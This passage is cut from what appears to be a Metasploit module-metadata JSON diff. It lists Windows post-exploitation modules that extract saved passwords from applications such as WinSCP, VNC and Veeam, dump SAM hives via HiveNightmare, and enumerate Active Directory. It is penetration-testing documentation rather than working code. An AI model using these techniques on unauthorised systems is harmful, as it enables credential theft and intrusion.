In\n order for decryption to be successful this module must be executed\n under the same privileges as the user which originally encrypted the\n password.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/tortoisesvn.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/tortoisesvn", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/total_commander": { + "name": "Windows Gather Total Commander Saved Password Extraction", + "fullname": "post/windows/gather/credentials/total_commander", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts weakly encrypted saved FTP Passwords from Total Commander.\n It finds saved FTP connections in the wcx_ftp.ini file.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/total_commander.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/total_commander", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/trillian": { + "name": "Windows Gather Trillian Password Extractor", + "fullname": "post/windows/gather/credentials/trillian", 
+ "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sil3ntDre4m ", + "Unknown" + ], + "description": "This module extracts account password from Trillian & Trillian Astra\n v4.x-5.x instant messenger.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/trillian.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/trillian", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/veeam_credential_dump": { + "name": "Veeam Backup and Replication Credentials Dump", + "fullname": "post/windows/gather/credentials/veeam_credential_dump", + "aliases": [], + "rank": 0, + "disclosure_date": "2022-11-22", + "type": "post", + "author": [ + "npm " + ], + "description": "This module exports and decrypts credentials from Veeam Backup & Replication and\n Veeam ONE Monitor Server to a CSV file; it is intended as a post-exploitation\n module for Windows hosts with either of these products installed. 
The module\n supports automatic detection of VBR / Veeam ONE and is capable of decrypting\n credentials for all versions including the latest build of 11.x.", + "references": [ + "URL-https://blog.checkymander.com/red%20team/veeam/decrypt-veeam-passwords/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/post/windows/gather/credentials/veeam_credential_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/veeam_credential_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "Decrypt", + "description": "Decrypt Veeam database export CSV files" + }, + { + "name": "Dump", + "description": "Export Veeam databases and perform decryption" + }, + { + "name": "Export", + "description": "Export Veeam databases without decryption" + } + ] + }, + "post_windows/gather/credentials/viber": { + "name": "Viber credential gatherer", + "fullname": "post/windows/gather/credentials/viber", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials in Viber desktop application on a remote Windows host. Viber is a cross-platform voice over IP and instant messaging software application.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/credentials/viber.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/viber", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/vnc": { + "name": "Windows Gather VNC Password Extraction", + "fullname": "post/windows/gather/credentials/vnc", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kurt Grutzmacher ", + "mubix " + ], + "description": "This module extract DES encrypted passwords in known VNC locations", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/vnc.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/vnc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + 
"Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/whatsupgold_credential_dump": { + "name": "WhatsUp Gold Credentials Dump", + "fullname": "post/windows/gather/credentials/whatsupgold_credential_dump", + "aliases": [], + "rank": 0, + "disclosure_date": "2022-11-22", + "type": "post", + "author": [ + "sshah ", + "npm " + ], + "description": "This module exports and decrypts credentials from WhatsUp Gold to a CSV file;\n it is intended as a post-exploitation module for Windows hosts with WhatsUp\n Gold installed. The module has been tested on and can successfully decrypt\n credentials from WhatsUp versions 11.0 to the latest (22.x). Extracted\n credentials are automatically added to loot.", + "references": [ + "CVE-2022-29845", + "CVE-2022-29846", + "CVE-2022-29847", + "CVE-2022-29848", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29845", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29846", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29847", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29848", + "URL-https://blog.assetnote.io/2022/06/09/whatsup-gold-exploit/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/post/windows/gather/credentials/whatsupgold_credential_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/whatsupgold_credential_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "Decrypt", + "description": "Decrypt WhatsUp Gold database export CSV file" + }, 
+ { + "name": "Dump", + "description": "Export WhatsUp Gold database and perform decryption" + }, + { + "name": "Export", + "description": "Export WhatsUp Gold database without decryption" + } + ] + }, + "post_windows/gather/credentials/winbox_settings": { + "name": "Windows Gather Mikrotik Winbox \"Keep Password\" Credentials Extractor", + "fullname": "post/windows/gather/credentials/winbox_settings", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Pasquale 'sid' Fiorillo" + ], + "description": "This module extracts Mikrotik Winbox credentials saved in the\n \"settings.cfg.viw\" file when the \"Keep Password\" option is\n selected in Winbox.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-09 00:43:10 +0000", + "path": "/modules/post/windows/gather/credentials/winbox_settings.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/winbox_settings", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/windows_autologin": { + "name": "Windows Gather AutoLogin User Credential Extractor", + "fullname": "post/windows/gather/credentials/windows_autologin", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Myo Soe" + ], + "description": "This module extracts the plain-text Windows user login password in Registry.\n It exploits a Windows feature that Windows (2000 to 2008 R2) allows a\n user or third-party Windows Utility tools to configure User AutoLogin via\n plain-text password insertion in (Alt)DefaultPassword field in the registry\n location - 
HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable\n by all users.", + "references": [ + "URL-http://support.microsoft.com/kb/315231", + "URL-http://core.yehg.net/lab/#tools.exploits" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/windows_autologin.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/windows_autologin", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/windows_sam_hivenightmare": { + "name": "Windows SAM secrets leak - HiveNightmare", + "fullname": "post/windows/gather/credentials/windows_sam_hivenightmare", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-07-20", + "type": "post", + "author": [ + "Kevin Beaumont", + "romarroca", + "Yann Castel (yann.castel " + ], + "description": "Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is possible for an unprivileged\n user to read those files. But, as they are locked while Windows is running we are not able\n to read them directly. The trick is to take advantage of Volume Shadow Copy, which is generally\n enabled, to finally have a read access. 
Once SAM and SYSTEM files are successfully dumped and\n stored in `store_loot`, you can dump the hashes with some external scripts like secretsdump.py", + "references": [ + "CVE-2021-36934", + "URL-https://github.com/GossiTheDog/HiveNightmare", + "URL-https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652", + "URL-https://github.com/romarroca/SeriousSam" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/windows_sam_hivenightmare", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "HiveNightmare", + "SeriousSAM" + ], + "Reliability": [], + "SideEffects": [], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/windowslivemail": { + "name": "Windows Live Mail credential gatherer", + "fullname": "post/windows/gather/credentials/windowslivemail", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Windows Live Mail credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/windowslivemail.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/windowslivemail", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/winscp": { + "name": "Windows Gather WinSCP Saved Password Extraction", + "fullname": "post/windows/gather/credentials/winscp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts weakly encrypted saved passwords from\n WinSCP. It searches for saved sessions in the Windows Registry\n and the WinSCP.ini file. 
It cannot decrypt passwords if a master\n password is used.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/winscp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/winscp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/wsftp_client": { + "name": "Windows Gather WS_FTP Saved Password Extraction", + "fullname": "post/windows/gather/credentials/wsftp_client", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts weakly encrypted saved FTP Passwords\n from WS_FTP. 
It finds saved FTP connections in the ws_ftp.ini file.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/wsftp_client.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/wsftp_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/xchat": { + "name": "XChat credential gatherer", + "fullname": "post/windows/gather/credentials/xchat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Xchat credentials on a Windows host. 
XChat is an IRC chat program for both Linux and Windows.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/credentials/xchat.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/xchat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/xshell_xftp_password": { + "name": "Windows Gather Xshell and Xftp Passwords", + "fullname": "post/windows/gather/credentials/xshell_xftp_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kali-Team " + ], + "description": "This module can decrypt the password of xshell and xftp,\n if the user chooses to remember the password.", + "references": [ + "URL-https://github.com/HyperSine/how-does-Xmanager-encrypt-password/blob/master/doc/how-does-Xmanager-encrypt-password.md" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/windows/gather/credentials/xshell_xftp_password.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/xshell_xftp_password", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/dnscache_dump": { + "name": "Windows Gather DNS Cache", + "fullname": "post/windows/gather/dnscache_dump", + "aliases": [], + "rank": 
300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module displays the records stored in the DNS cache.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/dnscache_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/dnscache_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/dumplinks": { + "name": "Windows Gather Dump Recent Files lnk Info", + "fullname": "post/windows/gather/dumplinks", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "davehull " + ], + "description": "The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script.\n This module will parse .lnk files from a user's Recent Documents folder\n and Microsoft Office's Recent Documents folder, if present.\n Windows creates these link files automatically for many common file types.\n The .lnk files contain time stamps, file locations, including share\n names, volume serial numbers, and more.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/dumplinks.rb", + "is_install_path": true, + "ref_name": "windows/gather/dumplinks", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, 
+ "post_windows/gather/enum_ad_bitlocker": { + "name": "Windows Gather Active Directory BitLocker Recovery", + "fullname": "post/windows/gather/enum_ad_bitlocker", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will enumerate BitLocker recovery passwords in the default AD\n directory. This module does require Domain Admin or other delegated privileges.", + "references": [ + "URL-https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_bitlocker.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_bitlocker", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_computers": { + "name": "Windows Gather Active Directory Computers", + "fullname": "post/windows/gather/enum_ad_computers", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will enumerate computers in the default AD directory.\n\n Optional Attributes to use in ATTRIBS:\n objectClass, cn, description, distinguishedName, instanceType, whenCreated,\n whenChanged, uSNCreated, uSNChanged, name, objectGUID,\n userAccountControl, badPwdCount, codePage, countryCode,\n badPasswordTime, lastLogoff, lastLogon, localPolicyFlags,\n pwdLastSet, primaryGroupID, objectSid, accountExpires,\n logonCount, sAMAccountName, sAMAccountType, operatingSystem,\n operatingSystemVersion, operatingSystemServicePack, serverReferenceBL,\n dNSHostName, 
rIDSetPreferences, servicePrincipalName, objectCategory,\n netbootSCPBL, isCriticalSystemObject, frsComputerReferenceBL,\n lastLogonTimestamp, msDS-SupportedEncryptionTypes\n\n ActiveDirectory has a MAX_SEARCH limit of 1000 by default. Split search up\n if you hit that limit.\n\n Possible filters:\n (objectClass=computer) # All Computers\n (primaryGroupID=516) # All Domain Controllers\n (&(objectCategory=computer)(operatingSystem=*server*)) # All Servers", + "references": [ + "URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_computers.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_computers", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_groups": { + "name": "Windows Gather Active Directory Groups", + "fullname": "post/windows/gather/enum_ad_groups", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will enumerate AD groups on the specified domain.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_groups.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_groups", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + 
"Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_managedby_groups": { + "name": "Windows Gather Active Directory Managed Groups", + "fullname": "post/windows/gather/enum_ad_managedby_groups", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will enumerate AD groups on the specified domain which are specifically managed.\n It cannot at the moment identify whether the 'Manager can update membership list' option\n option set; if so, it would allow that member to update the contents of that group. This\n could either be used as a persistence mechanism (for example, set your user as the 'Domain\n Admins' group manager) or could be used to detect privilege escalation opportunities\n without having domain admin privileges.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_managedby_groups.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_managedby_groups", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_service_principal_names": { + "name": "Windows Gather Active Directory Service Principal Names", + "fullname": "post/windows/gather/enum_ad_service_principal_names", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell ", + "Scott Sutherland" + ], + "description": "This module will enumerate servicePrincipalName in the default AD directory\n where the user is a member of the Domain Admins 
group.", + "references": [ + "URL-https://www.netspi.com/blog/entryid/214/faster-domain-escalation-using-ldap" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_service_principal_names.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_service_principal_names", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_to_wordlist": { + "name": "Windows Active Directory Wordlist Builder", + "fullname": "post/windows/gather/enum_ad_to_wordlist", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Thomas Ring" + ], + "description": "This module will gather information from the default Active Domain (AD) directory\n and use these words to seed a wordlist. 
By default it enumerates user accounts to\n build the wordlist.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_to_wordlist.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_to_wordlist", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_user_comments": { + "name": "Windows Gather Active Directory User Comments", + "fullname": "post/windows/gather/enum_ad_user_comments", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will enumerate user accounts in the default Active Domain (AD) directory which\n contain 'pass' in their description or comment (case-insensitive) by default. 
In some cases,\n such users have their passwords specified in these fields.", + "references": [ + "URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_user_comments.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_user_comments", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_users": { + "name": "Windows Gather Active Directory Users", + "fullname": "post/windows/gather/enum_ad_users", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell ", + "Carlos Perez ", + "Stuart Morgan " + ], + "description": "This module will enumerate user accounts in the default Active Domain (AD) directory and stores\n them in the database. If GROUP_MEMBER is set to the DN of a group, this will list the members of\n that group by performing a recursive/nested search (i.e. 
it will list users who are members of\n groups that are members of groups that are members of groups (etc) which eventually include the\n target group DN.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_users.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_users", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_applications": { + "name": "Windows Gather Installed Application Enumeration", + "fullname": "post/windows/gather/enum_applications", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will enumerate all installed applications on a Windows system", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_applications.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_applications", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_artifacts": { + "name": "Windows Gather File and Registry Artifacts Enumeration", + "fullname": "post/windows/gather/enum_artifacts", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "averagesecurityguy " + ], + 
"description": "This module will check the file system and registry for particular artifacts.\n\n The list of artifacts is read in YAML format from data/post/enum_artifacts_list.txt\n or a user specified file. Any matches are written to the loot.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-08-07 16:01:45 +0000", + "path": "/modules/post/windows/gather/enum_artifacts.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_artifacts", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "powershell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_av": { + "name": "Windows Installed AntiVirus Enumeration", + "fullname": "post/windows/gather/enum_av", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "rageltman " + ], + "description": "This module will enumerate the AV products detected by WMIC", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-04-21 11:35:33 +0000", + "path": "/modules/post/windows/gather/enum_av.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_av", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_av_excluded": { + "name": "Windows Antivirus Exclusions Enumeration", + "fullname": "post/windows/gather/enum_av_excluded", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + 
